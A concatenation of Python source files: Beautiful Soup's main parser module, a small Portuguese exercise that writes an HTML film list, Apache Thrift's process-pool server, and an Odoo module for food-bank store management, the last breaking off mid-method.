For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/bs4/doc/
"""
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.4.1"
__copyright__ = "Copyright (c) 2004-2015 Leonard Richardson"
__license__ = "MIT"
__all__ = ['BeautifulSoup']
import os
import re
import warnings
from .builder import builder_registry, ParserRejectedMarkup
from .dammit import UnicodeDammit
from .element import (
CData,
Comment,
DEFAULT_OUTPUT_ENCODING,
Declaration,
Doctype,
NavigableString,
PageElement,
ProcessingInstruction,
ResultSet,
SoupStrainer,
Tag,
)
# The very first thing we do is give a useful error if someone is
# running this code under Python 3 without converting it.
'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work.'<>'You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
class BeautifulSoup(Tag):
"""
This class defines the basic interface called by the tree builders.
These methods will be called by the parser:
reset()
feed(markup)
The tree builder may call these methods from its feed() implementation:
handle_starttag(name, attrs) # See note about return value
handle_endtag(name)
handle_data(data) # Appends to the current data node
endData(containerClass=NavigableString) # Ends the current data node
No matter how complicated the underlying parser is, you should be
able to build a tree using 'start tag' events, 'end tag' events,
'data' events, and "done with data" events.
If you encounter an empty-element tag (aka a self-closing tag,
like HTML's <br> tag), call handle_starttag and then
handle_endtag.
"""
ROOT_TAG_NAME = u'[document]'
# If the end-user gives no indication which tree builder they
# want, look for one with these features.
DEFAULT_BUILDER_FEATURES = ['html', 'fast']
ASCII_SPACES = '\x20\x0a\x09\x0c\x0d'
NO_PARSER_SPECIFIED_WARNING = "No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system (\"%(parser)s\"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.\n\nTo get rid of this warning, change this:\n\n BeautifulSoup([your markup])\n\nto this:\n\n BeautifulSoup([your markup], \"%(parser)s\")\n"
def __init__(self, markup="", features=None, builder=None,
parse_only=None, from_encoding=None, exclude_encodings=None,
**kwargs):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser."""
if 'convertEntities' in kwargs:
warnings.warn(
"BS4 does not respect the convertEntities argument to the "
"BeautifulSoup constructor. Entities are always converted "
"to Unicode characters.")
if 'markupMassage' in kwargs:
del kwargs['markupMassage']
warnings.warn(
"BS4 does not respect the markupMassage argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for any necessary markup massage.")
if 'smartQuotesTo' in kwargs:
del kwargs['smartQuotesTo']
warnings.warn(
"BS4 does not respect the smartQuotesTo argument to the "
"BeautifulSoup constructor. Smart quotes are always converted "
"to Unicode characters.")
if 'selfClosingTags' in kwargs:
del kwargs['selfClosingTags']
warnings.warn(
"BS4 does not respect the selfClosingTags argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for understanding self-closing tags.")
if 'isHTML' in kwargs:
del kwargs['isHTML']
warnings.warn(
"BS4 does not respect the isHTML argument to the "
"BeautifulSoup constructor. Suggest you use "
"features='lxml' for HTML and features='lxml-xml' for "
"XML.")
def deprecated_argument(old_name, new_name):
if old_name in kwargs:
warnings.warn(
'The "%s" argument to the BeautifulSoup constructor '
'has been renamed to "%s."' % (old_name, new_name))
value = kwargs[old_name]
del kwargs[old_name]
return value
return None
parse_only = parse_only or deprecated_argument(
"parseOnlyThese", "parse_only")
from_encoding = from_encoding or deprecated_argument(
"fromEncoding", "from_encoding")
if len(kwargs) > 0:
arg = kwargs.keys().pop()
raise TypeError(
"__init__() got an unexpected keyword argument '%s'" % arg)
if builder is None:
original_features = features
if isinstance(features, basestring):
features = [features]
if features is None or len(features) == 0:
features = self.DEFAULT_BUILDER_FEATURES
builder_class = builder_registry.lookup(*features)
if builder_class is None:
raise FeatureNotFound(
"Couldn't find a tree builder with the features you "
"requested: %s. Do you need to install a parser library?"
% ",".join(features))
builder = builder_class()
if not (original_features == builder.NAME or
original_features in builder.ALTERNATE_NAMES):
if builder.is_xml:
markup_type = "XML"
else:
markup_type = "HTML"
warnings.warn(self.NO_PARSER_SPECIFIED_WARNING % dict(
parser=builder.NAME,
markup_type=markup_type))
self.builder = builder
self.is_xml = builder.is_xml
self.builder.soup = self
self.parse_only = parse_only
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
elif len(markup) <= 256:
# Print out warnings for a couple beginner problems
# involving passing non-markup to Beautiful Soup.
# Beautiful Soup will still parse the input as markup,
# just in case that's what the user really wants.
if (isinstance(markup, unicode)
and not os.path.supports_unicode_filenames):
possible_filename = markup.encode("utf8")
else:
possible_filename = markup
is_file = False
try:
is_file = os.path.exists(possible_filename)
except Exception, e:
# This is almost certainly a problem involving
# characters not valid in filenames on this
# system. Just let it go.
pass
if is_file:
if isinstance(markup, unicode):
markup = markup.encode("utf8")
warnings.warn(
'"%s" looks like a filename, not markup. You should probably open this file and pass the filehandle into Beautiful Soup.' % markup)
if markup[:5] == "http:" or markup[:6] == "https:":
# TODO: This is ugly but I couldn't get it to work in
# Python 3 otherwise.
if ((isinstance(markup, bytes) and not b' ' in markup)
or (isinstance(markup, unicode) and not u' ' in markup)):
if isinstance(markup, unicode):
markup = markup.encode("utf8")
warnings.warn(
'"%s" looks like a URL. Beautiful Soup is not an HTTP client. You should probably use an HTTP client to get the document behind the URL, and feed that document to Beautiful Soup.' % markup)
for (self.markup, self.original_encoding, self.declared_html_encoding,
self.contains_replacement_characters) in (
self.builder.prepare_markup(
markup, from_encoding, exclude_encodings=exclude_encodings)):
self.reset()
try:
self._feed()
break
except ParserRejectedMarkup:
pass
# Clear out the markup and remove the builder's circular
# reference to this object.
self.markup = None
self.builder.soup = None
def __copy__(self):
return type(self)(self.encode(), builder=self.builder)
def __getstate__(self):
# Frequently a tree builder can't be pickled.
d = dict(self.__dict__)
if 'builder' in d and not self.builder.picklable:
del d['builder']
return d
def _feed(self):
# Convert the document to Unicode.
self.builder.reset()
self.builder.feed(self.markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.current_data = []
self.currentTag = None
self.tagStack = []
self.preserve_whitespace_tag_stack = []
self.pushTag(self)
def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
"""Create a new tag associated with this soup."""
return Tag(None, self.builder, name, namespace, nsprefix, attrs)
def new_string(self, s, subclass=NavigableString):
"""Create a new NavigableString associated with this soup."""
return subclass(s)
def insert_before(self, successor):
raise NotImplementedError("BeautifulSoup objects don't support insert_before().")
def insert_after(self, successor):
raise NotImplementedError("BeautifulSoup objects don't support insert_after().")
def popTag(self):
tag = self.tagStack.pop()
if self.preserve_whitespace_tag_stack and tag == self.preserve_whitespace_tag_stack[-1]:
self.preserve_whitespace_tag_stack.pop()
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
if tag.name in self.builder.preserve_whitespace_tags:
self.preserve_whitespace_tag_stack.append(tag)
def endData(self, containerClass=NavigableString):
if self.current_data:
current_data = u''.join(self.current_data)
# If whitespace is not preserved, and this string contains
# nothing but ASCII spaces, replace it with a single space
# or newline.
if not self.preserve_whitespace_tag_stack:
strippable = True
for i in current_data:
if i not in self.ASCII_SPACES:
strippable = False
break
if strippable:
if '\n' in current_data:
current_data = '\n'
else:
current_data = ' '
# Reset the data collector.
self.current_data = []
# Should we add this string to the tree at all?
if self.parse_only and len(self.tagStack) <= 1 and \
(not self.parse_only.text or \
not self.parse_only.search(current_data)):
return
o = containerClass(current_data)
self.object_was_parsed(o)
def object_was_parsed(self, o, parent=None, most_recent_element=None):
"""Add an object to the parse tree."""
parent = parent or self.currentTag
previous_element = most_recent_element or self._most_recent_element
next_element = previous_sibling = next_sibling = None
if isinstance(o, Tag):
next_element = o.next_element
next_sibling = o.next_sibling
previous_sibling = o.previous_sibling
if not previous_element:
previous_element = o.previous_element
o.setup(parent, previous_element, next_element, previous_sibling, next_sibling)
self._most_recent_element = o
parent.contents.append(o)
if parent.next_sibling:
# This node is being inserted into an element that has
# already been parsed. Deal with any dangling references.
index = parent.contents.index(o)
if index == 0:
previous_element = parent
previous_sibling = None
else:
previous_element = previous_sibling = parent.contents[index-1]
if index == len(parent.contents)-1:
next_element = parent.next_sibling
next_sibling = None
else:
next_element = next_sibling = parent.contents[index+1]
o.previous_element = previous_element
if previous_element:
previous_element.next_element = o
o.next_element = next_element
if next_element:
next_element.previous_element = o
o.next_sibling = next_sibling
if next_sibling:
next_sibling.previous_sibling = o
o.previous_sibling = previous_sibling
if previous_sibling:
previous_sibling.next_sibling = o
def _popToTag(self, name, nsprefix=None, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
# The BeautifulSoup object itself can never be popped.
return
most_recently_popped = None
stack_size = len(self.tagStack)
for i in range(stack_size - 1, 0, -1):
t = self.tagStack[i]
if (name == t.name and nsprefix == t.prefix):
if inclusivePop:
most_recently_popped = self.popTag()
break
most_recently_popped = self.popTag()
return most_recently_popped
def handle_starttag(self, name, namespace, nsprefix, attrs):
"""Push a start tag on to the stack.
If this method returns None, the tag was rejected by the
SoupStrainer. You should proceed as if the tag had not occurred
in the document. For instance, if this was a self-closing tag,
don't call handle_endtag.
"""
# print "Start tag %s: %s" % (name, attrs)
self.endData()
if (self.parse_only and len(self.tagStack) <= 1
and (self.parse_only.text
or not self.parse_only.search_tag(name, attrs))):
return None
tag = Tag(self, self.builder, name, namespace, nsprefix, attrs,
self.currentTag, self._most_recent_element)
if tag is None:
return tag
if self._most_recent_element:
self._most_recent_element.next_element = tag
self._most_recent_element = tag
self.pushTag(tag)
return tag
def handle_endtag(self, name, nsprefix=None):
#print "End tag: " + name
self.endData()
self._popToTag(name, nsprefix)
def handle_data(self, data):
self.current_data.append(data)
def decode(self, pretty_print=False,
eventual_encoding=DEFAULT_OUTPUT_ENCODING,
formatter="minimal"):
"""Returns a string or Unicode representation of this document.
To get Unicode, pass None for encoding."""
if self.is_xml:
# Print the XML declaration
encoding_part = ''
if eventual_encoding != None:
encoding_part = ' encoding="%s"' % eventual_encoding
prefix = u'<?xml version="1.0"%s?>\n' % encoding_part
else:
prefix = u''
if not pretty_print:
indent_level = None
else:
indent_level = 0
return prefix + super(BeautifulSoup, self).decode(
indent_level, eventual_encoding, formatter)
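# A minimal usage sketch (illustrative, not part of the library). It assumes
# the stdlib-backed "html.parser" builder feature is available; passing it
# explicitly also avoids the NO_PARSER_SPECIFIED_WARNING above.
def _example_usage():
    soup = BeautifulSoup("<html><body><p>Hello</p></body></html>", "html.parser")
    print soup.p.string    # u'Hello'
    print soup.prettify()  # the document, re-indented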
# Alias to make it easier to type import: 'from bs4 import _soup'
_s = BeautifulSoup
_soup = BeautifulSoup
class BeautifulStoneSoup(BeautifulSoup):
"""Deprecated interface to an XML parser."""
def __init__(self, *args, **kwargs):
kwargs['features'] = 'xml'
warnings.warn(
'The BeautifulStoneSoup class is deprecated. Instead of using '
'it, pass features="xml" into the BeautifulSoup constructor.')
super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
class StopParsing(Exception):
pass
class FeatureNotFound(ValueError):
pass
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin)
print soup.prettify()
|
laenderoliveira/exerclivropy
|
refs/heads/master
|
cap09/listagem-09-08.py
|
1
|
f = {
"drama": ["Cidadão Kane", "O Poderoso Chefão"],
"comedia": ["Tempos Modernos", "American Pie", "Dr. Dolittle"],
"policial": ["Chuva Negra", "Desejo de Matar", "Difícil de Matar"],
"guerra": ["Rambo", "Platoon", "Tora!Tora!Tora"]
}
pagina = open("index.html", "w", encoding="utf-8")
pagina.write("<!DOCTYPE html>")
pagina.write("<html lang=\"en\">")
pagina.write("<head>")
pagina.write("<meta charset=\"UTF-8\">")
pagina.write("<title>Title</title>")
pagina.write("</head>")
pagina.write("<body>")
pagina.write("Olá")
for genero, filmes in f.items():
pagina.write(f"<h1>{genero}</h2>")
for filme in filmes:
pagina.write(f"<h2>{filme}</h2>")
pagina.write("</body>")
pagina.write("</html>")
pagina.close()
|
collinmsn/thrift
|
refs/heads/master
|
lib/py/src/server/TProcessPoolServer.py
|
47
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
from multiprocessing import Process, Value, Condition
from .TServer import TServer
from thrift.transport.TTransport import TTransportException
logger = logging.getLogger(__name__)
class TProcessPoolServer(TServer):
"""Server with a fixed size pool of worker subprocesses to service requests
Note that if you need shared state between the handlers, it's up to you to provide it!
Written by Dvir Volk, doat.com
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
if not callable(callback):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop getting clients from the shared queue and process them"""
if self.postForkCallback:
self.postForkCallback()
while self.isRunning.value:
try:
client = self.serverTransport.accept()
if not client:
continue
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
except Exception as x:
logger.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransportException:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start workers and put into queue"""
# this is a shared state that can tell the workers to exit when False
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
except Exception as x:
logger.exception(x)
# wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
except Exception as x:
logger.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
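# A hypothetical usage sketch (not part of this module). `processor` is a
# service Processor produced by the Thrift compiler; the port number and
# worker count are arbitrary examples.
def _example_serve(processor, port=9090):
    from thrift.transport import TSocket, TTransport
    from thrift.protocol import TBinaryProtocol
    server = TProcessPoolServer(
        processor,                                 # generated service processor
        TSocket.TServerSocket(port=port),          # listening transport
        TTransport.TBufferedTransportFactory(),    # transport factory
        TBinaryProtocol.TBinaryProtocolFactory())  # protocol factory
    server.setNumWorkers(4)  # serve() will fork four worker processes
    server.serve()           # blocks until stop() is called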
|
ludwiktrammer/bestja
|
refs/heads/master
|
addons/bestja_stores/models.py
|
1
|
# -*- coding: utf-8 -*-
import re
import datetime
from openerp import models, fields, api, exceptions
class RetailChain(models.Model):
_name = 'bestja_stores.chain'
name = fields.Char(required=True)
class Store(models.Model):
_name = 'bestja_stores.store'
_inherit = [
'protected_fields.mixin',
'ir.needaction_mixin',
'message_template.mixin',
]
_protected_fields = ['state']
_permitted_groups = ['bestja_base.instance_admin']
STATES = [
('pending', u"oczekujący"),
('accepted', u"zaakceptowany"),
('rejected', u"odrzucony"),
]
@api.model
def _default_responsible(self):
return self.env['organization'].search([
('level', '=', 1),
'|', # noqa
('coordinator', '=', self.env.uid),
('children.coordinator', '=', self.env.uid),
])
@api.model
def _default_default_partner(self):
return self.env['organization'].search([
('level', '>=', 1),
('coordinator', '=', self.env.uid),
])
name = fields.Char(required=True, string=u"Nazwa")
state = fields.Selection(STATES, default='pending', required=True, string=u"Status")
chain = fields.Many2one('bestja_stores.chain', string=u"Sieć Handlowa")
chain_id = fields.Char(
groups='bestja_project_hierarchy.managers_level0',
string=u"ID sklepu",
)
address = fields.Char(required=True, string=u"Ulica i numer")
city = fields.Char(required=True, string=u"Miasto")
postal_code = fields.Char(size=6, required=True, string=u"Kod pocztowy")
voivodeship = fields.Many2one('volunteer.voivodeship', required=True, string=u"Województwo")
responsible = fields.Many2one(
'organization',
domain='''[
('level', '=', 1),
'|',
('coordinator', '=', uid),
'|',
('parent.coordinator', '=', uid),
('children.coordinator', '=', uid),
]''',
required=True,
default=_default_responsible,
string=u"BŻ odpowiedzialny",
)
default_partner = fields.Many2one(
'organization',
domain='''[
('level', '>=', 1),
'|',
('id', '=', responsible),
('parent', '=', responsible),
'|',
('coordinator', '=', uid),
'|',
('parent.coordinator', '=', uid),
('parent.parent.coordinator', '=', uid),
]''',
default=_default_default_partner, # default ;)
required=True,
string=u"Domyślny partner",
)
user_is_responsible = fields.Boolean(compute="_compute_user_is_responsible")
user_is_federation = fields.Boolean(compute="_compute_user_is_federation")
user_is_partner = fields.Boolean(compute="_compute_user_is_partner")
in_projects = fields.One2many('bestja_stores.store_in_project', inverse_name='store')
active = fields.Boolean(default=True)
@api.one
def set_accepted(self):
self.state = 'accepted'
self.send(
template='bestja_stores.msg_store_accepted',
recipients=self.default_partner.coordinator,
)
@api.one
def set_rejected(self):
self.state = 'rejected'
self.send(
template='bestja_stores.msg_store_rejected',
recipients=self.default_partner.coordinator,
sender=self.env.user,
)
@api.one
def archive(self):
if not self.user_is_responsible and not self.user_is_federation and not self.user_is_partner:
raise exceptions.AccessError("Nie masz uprawnień żeby archiwizować ten sklep!")
self.sudo().active = False
@api.one
@api.constrains('default_partner', 'responsible')
def _check_default_partner(self):
if self.default_partner.parent != self.responsible and self.default_partner != self.responsible:
raise exceptions.ValidationError("Domyślny partner musi podlegać wybranemu Bankowi Żywności!")
@api.one
@api.constrains('responsible')
def _check_responsible_level(self):
if self.responsible.level != 1:
raise exceptions.ValidationError("Organizacja odpowiedzialna musi być Bankiem!")
@api.one
@api.depends('responsible', 'responsible.coordinator')
def _compute_user_is_responsible(self):
"""
Is the current user the coordinator of the Bank responsible for this store?
"""
self.user_is_responsible = (self.responsible.coordinator.id == self.env.uid)
@api.one
@api.depends('responsible', 'responsible.parent')
def _compute_user_is_federation(self):
self.user_is_federation = (
self.responsible.parent.coordinator.id == self.env.uid and self.responsible.parent.level == 0
)
@api.one
@api.depends('default_partner', 'default_partner.coordinator')
def _compute_user_is_partner(self):
self.user_is_partner = (self.default_partner.coordinator.id == self.env.uid)
@api.model
def _needaction_domain_get(self):
"""
Show pending count in menu.
"""
if not self.user_has_groups('bestja_base.instance_admin'):
return False
return [
('state', '=', 'pending'),
]
@api.model
def create(self, vals):
record = super(Store, self).create(vals)
record.send_group(
template='bestja_stores.msg_new_store',
group='bestja_base.instance_admin',
)
return record
@api.model
def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):
# Adds a `__free_for_project__` domain operator. Yeah - adding a domain operator
# to a single model to support a particular case seems like an act of complete
# desperation. That's because it is an act of complete desperation.
#
# The problem is it seems there is no way to create an Odoo domain that
# would select objects that are NOT in many2many relation with a particular
# object.
#
# Example usage of the new operator:
# [('store', '__free_for_project__', project)]
#
# It will select stores that are free to use with the `project` (are not
# already reserved).
for i, arg in enumerate(args):
if isinstance(arg, (tuple, list)) and len(arg) == 3 and arg[1] == '__free_for_project__':
left, _, right = arg
project = self.env['bestja.project'].browse([right])
reserved_inprojects = self.env['bestja_stores.store_in_project'].search([
('top_project', '=', project.top_parent.id),
('state', 'not in', ['rejected', 'deactivated']),
])
reserved_stores = {record.store.id for record in reserved_inprojects}
args[i] = (left, 'not in', list(reserved_stores))
return super(Store, self)._search(
args=args,
offset=offset,
limit=limit,
order=order,
count=count,
access_rights_uid=access_rights_uid,
)
@api.one
def name_get(self):
name_string = ", ".join([self.name, self.address, self.city])
return (self.id, name_string)
class StoreInProject(models.Model):
_name = 'bestja_stores.store_in_project'
_inherit = [
'protected_fields.mixin',
'ir.needaction_mixin',
'message_template.mixin',
]
_protected_fields = ['state', 'proposed_by', 'time_deactivated']
_order = 'state'
STATES = [
('waiting_bank', u"oczekuje na bank"),
('waiting_partner', u"oczekuje na partnera"),
('rejected', u"odrzucony"),
('activated', u"aktywowany"),
('deactivated', u"dezaktywowany"),
('proposed', u"proponowany"),
('chain', u"wysłany do sieci"),
]
def _default_project(self):
if self.env.context.get('active_model') == 'bestja.project':
return self.env.context.get('active_id')
return self.env.context.get('default_project')
store = fields.Many2one(
'bestja_stores.store',
required=True,
domain='''[
('state', '=', 'accepted'),
('default_partner', '=', organization),
('id', '__free_for_project__', project),
]''', # a custom operator defined in Store's _search method
string=u"Sklep",
)
show_all_stores = fields.Boolean(
string=u"pokaż wszystkie sklepy Banku",
compute='_compute_show_all_stores',
inverse='_inverse_show_stores',
)
hide_used_stores = fields.Boolean(
string=u"ukryj wykorzystane w tej zbiórce",
compute='_compute_hide_used_stores',
inverse='_inverse_show_stores',
)
project = fields.Many2one(
'bestja.project',
required=True,
default=_default_project,
string="Projekt",
domain='''[
('use_stores', '=', True),
('organization', '=', organization),
('date_stop', '>=', current_date),
'|',
('organization.coordinator', '=', uid),
'|',
('manager', '=', uid),
'|',
('parent.organization.coordinator', '=', uid),
('parent.manager', '=', uid),
]''',
)
organization = fields.Many2one(
'organization',
compute='_compute_organization',
inverse='_inverse_organization',
required=True,
domain='''[
('level', '>=', 1),
('projects.top_parent', '=?', top_project),
'|',
('coordinator', '=', uid),
'|',
('projects.manager', '=', uid),
'|',
('parent.coordinator', '=', uid),
('parent.projects.manager', '=', uid),
]''',
string=u"Organizacja",
)
organization_name = fields.Char(related='organization.name', related_sudo=True, store=True, readonly=True, string=u"Nazwa organizacji")
proposed_by = fields.Many2one('organization', oldname='activated_by', string=u"Organizacja potwierdzająca")
proposed_time = fields.Datetime(string=u"Czas zaproponowania")
top_project = fields.Many2one(
'bestja.project',
related='project.top_parent',
store=True,
)
date_start = fields.Date(related='project.top_parent.date_start', readonly=True)
date_stop = fields.Date(related='project.top_parent.date_stop', readonly=True)
days = fields.One2many('bestja_stores.day', inverse_name='store')
state = fields.Selection(STATES, default='waiting_bank', required=True, string=u"Status aktywacji")
time_deactivated = fields.Datetime(string=u"Czas dezaktywacji")
name = fields.Char(related='store.name', store=True, readonly=True)
address = fields.Char(related='store.address', readonly=True)
city = fields.Char(related='store.city', store=True, readonly=True)
user_can_moderate = fields.Boolean(compute="_compute_user_can_moderate")
user_is_federation = fields.Boolean(compute="_compute_is_federation")
user_is_owner = fields.Boolean(compute="_compute_is_owner")
user_is_bank = fields.Boolean(compute="_compute_is_bank")
duplicated = fields.Char(compute="_compute_duplicated", string="Duplikat sklepu")
@api.multi
def display_state(self):
return dict(StoreInProject.STATES).get(self.state)
@api.model
def _needaction_domain_get(self):
"""
Show pending count in menu.
"""
return [
('state', 'in', ['waiting_bank', 'waiting_partner']),
'|', # noqa
('project.manager', '=', self.env.uid),
'|',
('project.organization.coordinator', '=', self.env.uid),
'|',
('project.parent.manager', '=', self.env.uid),
('project.parent.organization.coordinator', '=', self.env.uid),
]
@api.multi
def is_bank(self):
"""
Does the current user have privileges to act as bank
(organization level 1) overseeing the current project?
"""
self.ensure_one()
authorised_uids_1 = [
self.sudo().project.organization.coordinator.id,
self.sudo().project.manager.id,
]
authorised_uids_2 = [
self.sudo().project.parent.organization.coordinator.id,
self.sudo().project.parent.manager.id,
]
return (self.env.uid in authorised_uids_1 and self.sudo().project.organization_level == 1) or \
(self.env.uid in authorised_uids_2 and self.sudo().project.organization_level == 2)
@api.one
@api.depends('project', 'project.parent')
def _compute_is_bank(self):
self.user_is_bank = self.is_bank()
@api.multi
def is_federation(self):
"""
Does the current user have privileges to act as federation
(organization level 0) overseeing the current project?
"""
self.ensure_one()
authorised_uids = [
self.sudo().project.top_parent.organization.coordinator.id,
self.sudo().project.top_parent.manager.id,
]
return self.env.uid in authorised_uids and self.sudo().project.top_parent.organization_level == 0
@api.one
@api.depends('project', 'project.parent')
def _compute_is_federation(self):
self.user_is_federation = self.is_federation()
@api.multi
def is_owner(self):
"""
Does the current user have privileges to act as an owner
of the current project.
"""
self.ensure_one()
authorised_uids = [
self.sudo().project.organization.coordinator.id,
self.sudo().project.manager.id,
]
return self.env.uid in authorised_uids
@api.one
@api.depends('project')
def _compute_is_owner(self):
self.user_is_owner = self.is_owner()
@api.one
@api.depends('project', 'project.parent')
def _compute_user_can_moderate(self):
"""
Is the current user authorized to moderate (accept/reject) the store?
"""
if self.state == 'waiting_bank':
self.user_can_moderate = self.is_bank() and self.sudo().project.organization_level == 2
elif self.state == 'waiting_partner':
self.user_can_moderate = self.is_owner() or self.is_bank()
elif self.state in ('proposed', 'chain', 'activated'):
self.user_can_moderate = self.is_owner() or self.is_bank() or self.is_federation()
else:
self.user_can_moderate = False
@api.one
@api.depends('top_project', 'store')
def _compute_duplicated(self):
"""
"duplikat" if there are previous StoresInProject in this project linked to the same store,
empty otherwise. Used as a column for the XLS export.
"""
stores = self.search([
('top_project', '=', self.top_project.id),
('state', 'not in', ['rejected', 'deactivated']),
('store', '=', self.store.id),
])
if len(stores) > 1 and stores[0].id != self.id:
self.duplicated = "duplikat"
else:
self.duplicated = ""
@api.one
def set_proposed(self):
if not self.user_can_moderate:
raise exceptions.AccessError("Nie masz uprawnień aby proponować ten sklep!")
self.sudo().state = 'proposed'
self.sudo().proposed_time = fields.Datetime.now()
if self.is_owner():
self.sudo().proposed_by = self.project.organization
elif self.is_bank():
self.sudo().proposed_by = self.project.parent.organization
else:
# This shouldn't really happen, but we can't forbid super user
# from doing anything, so theoretically speaking it might...
self.sudo().proposed_by = False
@api.one
def set_deactivated(self):
if not self.user_can_moderate:
raise exceptions.AccessError("Nie masz uprawnień aby dezaktywować ten sklep!")
self.send(
template='bestja_stores.msg_in_project_deactivated',
recipients=self.top_project.responsible_user,
)
self.sudo().state = 'deactivated'
self.sudo().time_deactivated = fields.Datetime.now()
@api.one
def set_rejected(self):
if not self.user_can_moderate:
raise exceptions.AccessError("Nie masz uprawnień aby dezaktywować ten sklep!")
if self.state in ('proposed', 'chain', 'activated'):
raise exceptions.AccessError("Uprzednio proponowany sklep nie może zostać odrzucony!")
if self.state == 'waiting_bank':
self.send(
template='bestja_stores.msg_in_project_rejected',
recipients=self.project.responsible_user,
)
self.sudo().state = 'rejected'
@api.one
@api.depends('project.organization')
def _compute_organization(self):
if isinstance(self.id, models.NewId):
# can't use sudo with draft models,
# changing environment loses their values
self.organization = self.project.organization
else:
self.organization = self.sudo().project.organization
@api.one
def _compute_show_all_stores(self):
self.show_all_stores = False
@api.one
def _compute_hide_used_stores(self):
self.show_all_stores = True
@api.one
def _inverse_show_stores(self):
# The field is used for temporary purposes,
# no need to store its value
pass
@api.one
def _inverse_organization(self):
"""
If the project is readonly, the onchange('organization') below is not enough.
"""
if self.project and self.project.organization != self.organization:
organization_project = self.env['bestja.project'].search([
('organization', '=', self.organization.id),
('top_parent', '=', self.project.top_parent.id),
])
self.project = organization_project.id
@api.onchange('organization')
def _onchange_organization(self):
"""
Change the project to one from the same project hierarchy,
but from the right organization.
"""
if not self.organization:
return # Leave the previous project information
if isinstance(self.project.id, models.NewId):
# self.project is in draft mode, which unfortunately means
# we can't access its id (and we need it!).
# Fortunately it also means that its the currently opened
# project and we can get its id from context :)
current_project = self.env.context.get('default_project')
project = self.env['bestja.project'].browse([current_project])
else:
project = self.project
if project:
organization_project = self.env['bestja.project'].search([
('organization', '=', self.organization.id),
('top_parent', '=', project.top_parent.id),
])
self.project = organization_project.id
@api.onchange('show_all_stores', 'hide_used_stores')
def _onchange_show_all_stores(self):
if self.show_all_stores and self.hide_used_stores:
store_domain = """[
('state', '=', 'accepted'),
('id', '__free_for_project__', project),
'|',
('responsible', '=', organization),
('responsible.children', '=', organization),
]"""
elif self.show_all_stores:
store_domain = """[
('state', '=', 'accepted'),
'|',
('responsible', '=', organization),
('responsible.children', '=', organization),
]"""
else:
self.hide_used_stores = True
store_domain = self._fields['store'].domain
return {
'domain': {
'store': store_domain,
}
}
@api.one
@api.constrains('project', 'store')
def _check_free_for_project(self):
"""
Check if chosen store is free to be used in this project.
"""
if self.is_bank() or self.is_federation():
return # Bank can overwrite this
is_free = self.store.search_count([
('id', '=', self.store.id),
('id', '__free_for_project__', self.project.id),
])
if not is_free:
raise exceptions.ValidationError("Wybrany sklep jest już wykorzystany w tym projekcie!")
@api.model
def create(self, vals):
record = super(StoreInProject, self).create(vals)
if record.organization.level == 1 and record.is_owner():
# Middle organization adding for itself
record.sudo().state = 'proposed'
record.sudo().proposed_time = fields.Datetime.now()
record.sudo().proposed_by = record.project.organization.id
elif record.organization.level == 2:
if record.is_bank():
# Middle organization adding for its child
record.sudo().state = 'waiting_partner'
else:
record.sudo().state = 'waiting_bank'
else:
raise exceptions.AccessError("Nie masz uprawnień aby przypisać ten sklep!")
if not record.days:
# No days defined. Add the default set.
record.add_days()
return record
@api.multi
def write(self, vals):
if 'store' in vals:
